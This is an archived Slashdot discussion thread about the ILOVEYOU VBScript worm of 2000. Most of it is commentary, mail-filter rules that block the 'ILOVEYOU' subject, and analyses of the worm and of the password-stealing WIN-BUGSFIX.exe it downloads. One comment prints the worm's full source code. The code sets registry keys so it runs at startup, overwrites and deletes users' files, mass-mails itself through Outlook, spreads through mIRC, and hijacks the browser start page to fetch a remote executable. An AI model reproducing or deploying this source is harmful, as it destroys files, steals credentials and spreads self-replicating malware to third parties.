I Love You "Virus" Hates Everyone

Loquis was the first of seven billion readers to submit this story about the I Love You Virus and the UK. Its not really a virus: its a trojan that proclaims its love for the recipient and requests that you open its attachment. On a first date even! It then loves you so much that it sends copies of itself to everyone in your addressbook (slut!) and starts destorying files on your drive. Course they estimate that it's infected 10% of the UK. Pine/Elm/Mutt users as always laugh maniacally as the trojan shuffles countless wasted packets over saturated backbones filling overworked SMTP servers everywhere. Sysadmins are seen weeping in the alleys. Update: 05/04 03:12 by CT : My Roommate Kurt "The Pope" DeMaagd has written a better summary of the trojan and more importantly a HOWTO fix it. Windows users only ;) Requires registry hacking, so its not for everyone.

Total Cost of ownership if Outlook/Exchange

[smartin]

This is the second time in a couple of months that I've been at a company where this sort of thing has gone around and around. Companys really need to be aware of the consequences of using Outlook and Exchange. This does not happen when you are using Sendmail and a regular POP3 or IMAP client.

Re:Total Cost of ownership if Outlook/Exchange

[Malachi]

I think we need to see some responsibility on M$'s part to add some checks and balances to their open ended VB scripted Outlook. While we too got his by a Melissa like virus last month the Unix group just chuckled as the windows chickens ran about trying to stop the fire from spreading, or sending more spam by trying to tell people to not check it.

Curiously, can we file suit if one of these things gets really nasty? The last one that hit us just sent the person to a p0rn site and everyone in their addr book, reg keys, desktop, startup. What if this had been a formating virii? Talk about large scale data loss.

-Malachi-

Re:OPening e-mail attachments

[akey]

OK - I suppose it's wishful thinking to hope that users would realize by now not to open e-mail attachments they know nothing about...

Personally, I loved the quote from the journalist who said that she was suspicious when she received 5 copies of it, but since the last one was from Dow Jones, she opened it anyway... :-)

---

Solution for Postfix

[njr]

If not active in /etc/postfix/main.cf uncomment the line and change it to a line similar to:

header_checks = regexp:/etc/postfix/header_checks

Add the following line in /etc/postfix/header_checks:

/^Subject: ILOVEYOU/ REJECT

This will reject mails containing this subject.

Thanks to Claus Guttesen who posted this on the postfix mailling list.

Re:Solution for Postfix

[otmar]

Sendmail can filter that crap as well, just add

HSubject: $>local_check_header_subject
D{loveletterMessage}"553 Your message may contain a worm."
Slocal_check_header_subject
RILOVEYOU $#error $: ${loveletterMessage}

to your sendmail.cf (version > 8.9 !).

(there is a tab between the ILOVEYOU and $#error.)

/ol (credits go to a cow-orker, though)

Pretty Nasty actually

[scrutty]

We got hit in our office this morning. Obviously the techs like me were running Linux and laughed it off. But unlike Melissa this one actually carries a nasty payload.

It mails to everyone in your Outlook addressbook, not just 50. Also your MIRC nick list. It trawls all your mounted directories copying itself over all MP3's JPEGS .jpgs, style sheets and .js files amongst others

This actually managed to knock out half of our office , as well as render one of our live web servers pretty messed up , within under 10 minutes of the first person activating it. Yes, the webserver was a linux box, but one unfortunate had a subtree on a server that mirrored stuff to it mounted over a samba share

And no, you didn't have to click on it. That damn preview pane was enough to trigger it off.

Re:Pretty Nasty actually

[fooeyploo]

I really think Microsoft has been getting a lot of things backwards. I think a more appropriate name for Outlook would have been Lookout!

--
Don't throw your computers out the windows. Throw the Windows out of
your computers.

Re:Analysis

Sorry - lost the /n's there

It's a VBS worm. It spreads by two methods, irc and email.

On startup it sets the registry key
HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout
to 0

It then copies itself to WINNT/SYSTEM32/MSKernel32.vbs
WINNT/Win32DLL.vbs
WINNT/SYSTEM32/LOVE-LETTER-FOR-YOU.TXT

It then creates registry keys

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cu rrentVersion\Run\MSKernel32
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cu rrentVersion\RunServices\Win32DLL

which will run the script again on the next boot of the computer

Next it checks to see if ie download directory is set in the registry
- if it is it remembers that value, otherwise it uses c:\ instead.

It then checks to see it /WINNT/SYSTEM32/WInFAT32.exe exists - if it does
it sets internet explorers start page to download a file called WIN-BUGSFIX.exe from one of 4 places (randomly chosen) on www.skyinet.net

It then checks to see it this file has been downloaded (i.e. when the script is run at a later date). If it has to sets this .exe to be run at next boot and resets i.e home page to about:blank (blank page)

Next, it generates the file WINNT/SYSTEM32/LOVE-LETTER-FOR-YOU.HTM
This basically contains the worm itself set to run when the page is
viewed.

Now it does to old trick of openning the Outlook address book, grabbing
*all* the entries in it and emailing then an email with the subject line "ILOVEYOU" and the worm as an attachment.

Now it has a look around all the drives on the machine (local drives I think) as does the following
a) If it find mirc, edits it's ini file so when you next log onto an
irc channel it dcc's itself to all the other users
b) Overwrites any .vbs and .vbe files it finds with itself
c) If it finds any vbs, vbe, css,, wsh, sct or hta files it deletes them,
creates a new file with the same name ending in vbs and copies itself to
it
d) Does similar things to (c) to .mp3, .mp2, .jpg, .jpeg

Then the script ends

Stuart

Here is the Visual Basic Script that is "ILOVEYOU"

[GC]

rem barok -loveletter(vbe)
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,d ow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Micr osoft\Windows Scripting Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\MSKernel32",dirsystem&"\ MSKernel32.vbs"
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\RunServices\Win32DLL",dirwin &"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Micr osoft\Internet Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhj kxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7 679njbvYT/WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfd jghKJnwetryDGFikjUIyqwerWe546786324hjk4j nHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRp Gqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbv g/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNB mnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPh jasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg /WIN-BUGSFIX.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\WIN-BUGSFIX",downread&"\ WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eqfolderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.i ni")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,rega d
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software \Microsoft\WAB\"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Softwar e\Microsoft\WAB\"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR -YOU.TXT.vbs")
male.Send
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead ,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.Ad dressEntries.Count
else
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.Ad dressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="LOVELETTER - HTML"&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
"

This HTML file need ActiveX Control

To Enable to read this HTML file
- Please press #-#YES#-# button to Enable ActiveX"&vbcrlf& _
"----------z--------------------z---------- "&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
""
dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")
dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")
dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")
dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")
dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")
dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")
dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")
dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")
set fso=CreateObject("Scripting.FileSystemObject")
set c=fso.OpenTextFile(WScript.ScriptFullName,1)
lines=Split(c.ReadAll,vbcrlf)
l1=ubound(lines)
for n=0 to ubound(lines)
lines(n)=replace(lines(n),"'",chr(91)+chr(45)+ch r(91))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+c hr(93))
lines(n)=replace(lines(n),"\",chr(37)+chr(45)+ch r(37))
if (l1=n) then
lines(n)=chr(34)+lines(n)+chr(34)
else
lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"
end if
next
set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-Y OU.HTM")
b.close
set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU .HTM",2)
d.write dt5
d.write join(lines,vbcrlf)
d.write vbcrlf
d.write dt6
d.close
end sub

About ILOVEYOU

[TomV]

first up, I don't like the guy's coding style one bit :)

So what is it and what does it do?

It's a VBScript file using the Windows Script Host runtime (wscript.exe), which is on any W98 or W2k systems, plus those with IE4 or higher (plus several other products install it).

It propagates using OLE Automation against Outlook (any version), propagating both to Lists and individual addresses (internal function spreadtoemail()

It dicks with the registry to make one of four URL's at skyinet.net ending in /WIN-BUGFIX.exe into IE's start page (IE only as it uses IE's registry entries to do this).

Replaces any file of types vbs, vbe, js, jse, css, wsh, sct, hta, jpg, jpeg, mp2, mp3 with a copy of itself.

Places copies of itself into \windows and \windows\system as win32DLL.vbs and MSkernel32.vbs and tweaks the registry so that these are loaded at startup

builds a webpage and displays it, including a request for the user to disable ActiveX security.

If you're non Win32 it's totally irrelevant. If you're Win32 but don't use Outlook it'll bugger about with some files but won't propagate. If you're Windows All The Way then it's trouble.

Not only don't i like his coding style, but he doesn't even realize you can encode vbs files for obfuscation.

It's hit 340 lists at our firm so far.

TomV

LoveLetter worm: the full rundown

[RubiCon]

Okay, given a lot of the notices I've seen on this worm so far seem to be inaccurate, here's the rundown:

Files created/edited:
MSKernel32.vbs [created in System folder, copy of worm]
Win32DLL.vbs [created in Windows folder, copy of worm]
LOVE-LETTER-FOR-YOU.TXT.vbs [created in System folder, copy of worm]
LOVE-LETTER-FOR-YOU.HTM [created in System folder, web page with worm embedded in it]
WIN-BUGSFIX.exe [downloaded into default IE download folder]
WinFAT32.exe [created in System folder by WIN-BUGSFIX32.exe, unknown purpose]
*.vbs, *.vbe [overwritten with copy of worm]
*.js, *.jse, *.css, *.wsh, *.sct, *.hta [deleted, replaced with copy of worm with name <filename>.vbs]
*.jpg, *.jpeg [deleted, replaced with copy of worm with name <filename>.<ext>.vbs]
*.mp3, *.mp2 [hidden attribute set, copy of worm with name <filename>.<ext>.vbs created]
script.ini [if found in a directory with mIRC, overwritten with a script to output the HTML version of the worm to other users]

Registry keys created/edited:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run \MSKernel32 [created to run MSKernel32.vbs]
HKLM\Software\Microsoft\Windows\CurrentVersion\Run Services\Win32DLL [created to run Win32DLL.vbs]
HKCU\Software\Microsoft\Internet Explorer\Main\Start Page [altered to attempt to download WIN-BUGSFIX.exe on browser startup]
HKLM\Software\Microsoft\Windows\CurrentVersion\Run \WIN-BUGSFIX [created to run WIN-BUGSFIX.exe once downloaded]
HKCU\Software\Microsoft\WAB\... [one entry per address book entry plus a running total used during email propagation]

From all this you can work out the basic intention of the worm. It spreads via email propagation to everyone in your address book and by being sent via mIRC to other users. It maintains its hold on a machine by putting copies of itself in the Run and RunServices registry folders and by copying itself to files that look like existing files on the machine (presumably hoping the user has Hide Known File Extensions enabled).

I'm not sure about the .exe it attempts to download (other than its marker) because all the traffic has taken the target server the file is held on (www.skyinet.net) down.

Other info: the file orginates in Manila, Philippines according to comments in the worm, the email title it uses is 'ILOVEYOU' and the email text reads 'kindly check the attached LOVELETTER coming from me.'

Re:quick fix

[Chris+Hall]

does anybody know what the MS-BUGFIX.EXE file /does/ anyway?

I've not looked thoroughly (just a quick look with a disassembler at parts of it), so the following is incomplete, but among other things, it looks as though it can:

• Remove policies that prevent passwords from getting stored in the registry
• Watch every 150ms for a window entitled "Connect To", and when found select a checkbox (probably the one to remember passwords, but I've not got DUN installed on this machine, so I can't check)
• Grab all passwords stored in the registry, plus details of the machine's IP address, and that of any DNS and WINS servers.
• Connect using SMTP to smtp.super.net.ph, and send these details (and a few more, e.g. username and machine name) to mailme@super.net.ph
• Do something (not investigated what) with WinFAT32.exe
• Add policy to disable registry editing
• Set Internet Explorer's start page to about:blank

It seems incredibly poorly written. For example, lots of functions return a char* pointing to a local array. Extra padding arrays are added in an attempt to stop the stack from getting overwritten before the value is used.

Tried writing this in MS Word

[Analysis+Paralysis]

Only got as far as the second line when the paper-clip winked at me and asked "It looks like you're writing a virus. Would you like help?"

Nice to see some innovation at work here...

Microsoft: Don't Innovate, Regurgitate!

Re:Here is the Visual Basic Script that is "ILOVEY

[laborit]

Oh, great.

WASHINGTON, D.C. (Reuters) - The "I Love You" e-mail virus, which has crippled hundreds of businesses and ISPs in the U.K., has been traced to an American computer discussion site. "We were baffled as to where this deadly new threat had come from," said Richard Josephs of the FBI's computer crimes division, "until we learned that the source code to the virus was available on Slashdot.org." "Source code" refers to the computer-language instructions that a programmer "compiles" to produce a wide variety of applications, from Microsoft Word to Microsoft Excel.

The FBI was informed of the code at 8:03 Wednesday by a courageous anonymous hero, who claimed he has been monitoring the slashdot.org page for evidence of illegal activity ever since it published the "source code" for DeCSS, a program invented by hackers to illegally copy and resell copyrighted DVDs over the Web.

The Department of Justice is preparing to file charges against the hacker-friendly slashdot.org, despite protests from its owners. One, a shadowy figure known only as "CmdrTac0" claims that the source code could have come from anyone who received the virus. But experts say this is unlikely, because there is no known way to keep Microsoft Outlook from launching the virus program upon receipt.

We have been unable to find the anonymous hero who reported the presence of the code on Slashdot.org, but the FBI official who spoke with him said he repeatedly asked if they had the unlisted phone number of actress Natalie Portman.

Stacking dynamite

[Jeremi]

The annoying bit is now the FBI is going to make it their #1 priority to track down the author of this script and charge him with "millions of dollars in damages".

That's all well and good, but I wish they'd keep in mind that he wouldn't have been able to do any of this mischief without the months of labour on the part of Microsoft engineering that laid the groundwork for this sort of thing. OLE, VB, Outlook, etc all working together to help viruses propogate.

It's as if Microsoft has been stacking tubes of dynamite in the town hall for months, and one day some fruitcake comes in with a lit match. Sure, the fruitcake is guilty, but there's some serious negligence here as well...

Jeremy, your friendly Slashdot anti-M$ zealot

Now THIS is funny - it was faxed to me

[brennan73]

So this morning, I get a fax at work. It's directed at the old network admin, and is like six pages of junk, Windows registry settings and such. I put it aside, with the intention of calling the person later to tell them that he doesn't work here anymore and ask what in the world she sent me.

Then news of this virus starts going around, and I look closely at the fax. It says it "originated from a (COMPANY NAME) Faxcom," and has the attachment "LOVE-LETTER-FOR-YOU.TXT.vbs . Apparently, our fax number was in her computer, and it faxed us a text copy of the virus. Anyone want it? :)

-brennan

MS friendly news

[gad_zuki!]

I know this is a cliche, but where's the outrage? This is the *second* worldwide virus that uses the same type of security leak in 2 years. What I do see is lots of techies saying "I told you so," while the popular press is very uncritical of MS and Outlook. When will the press use words like 'very unsecure' when describing Outlook or just MS in general?

What do you think is the % of people who will quit using Outlook after being hit by this? 5% 1% 0%? If the press would do its job, namely informing and protecting the layman we'd see a lot less Outlook users. Instead we get 'don't open this mail, which is useless when the preview pane is always on' and 'all is well, download new virus updates, MS is still your friend.'

Quote from Microsoft

[wowbagger]

This is a real quote from Scott Culp, program manager for Microsoft's security response center"

In this case the virus author chose to target Outlook probably because it gave him better reach. There isn't a security
vulnerability in Outlook involved in this at all.

I didn't realize Microsoft was in Egypt, because this guy's clearly in denial.

I wonder if anybody is going to bring a class action suit against Microsoft for not closing this security hole back when Melissa came out.